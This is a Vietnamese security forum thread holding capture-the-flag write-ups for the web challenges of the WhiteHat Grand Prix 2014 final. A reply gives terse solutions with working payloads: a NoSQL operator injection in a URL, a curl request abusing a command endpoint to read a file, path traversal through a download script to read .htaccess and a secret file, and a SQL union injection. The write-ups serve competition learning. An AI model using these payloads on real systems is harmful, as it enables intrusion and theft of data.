[Writeup] Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014

BkavCR

VIP Members
27/09/2013
104
203 bài viết
[Writeup] Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014
Topic này được tạo để các bạn viết, trao đổi thảo luận về Writeup Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014.

Đề thi: Mời bạn đăng nhập vào trang http://grandprix.whitehat.vn/ bằng tài khoản và mật khẩu WhiteHat Forum để lấy đề thi.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: [Writeup] Chủ đề WebVuln - Vòng Chung kết WhiteHat Grand Prix 2014

Web100:
Mã:
http://103.237.98.38/web100/index.php?name[$ne]=abc
Web300:
Mã:
curl -ik http://103.237.98.38/web300/execute.php -d "command=sha1sum&filename=login.php"
Down login.php -> decode -> flag
Web400:
Mã:
http://103.237.98.38/web400/

SQLi trong phần reg/login, mình ko nhớ rõ nhưng đại loại leak ở sessionid khi login.
Vào được admin -> http://103.237.98.38/web400/broken/data/download.php . đoán đc field ?file=download.php

view-source:http://103.237.98.38/web400/broken/data/download.php?file=protecteD/.htaccess
view-source:http://103.237.98.38/web400/broken/data/download.php?file=protecteD/_secret__


Web trong phần Att/Def:
Mã:
Lỗi nằm ở phần download file sau khi upload, đại loại là: -1' union select 1,'./flag/...' -- a
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên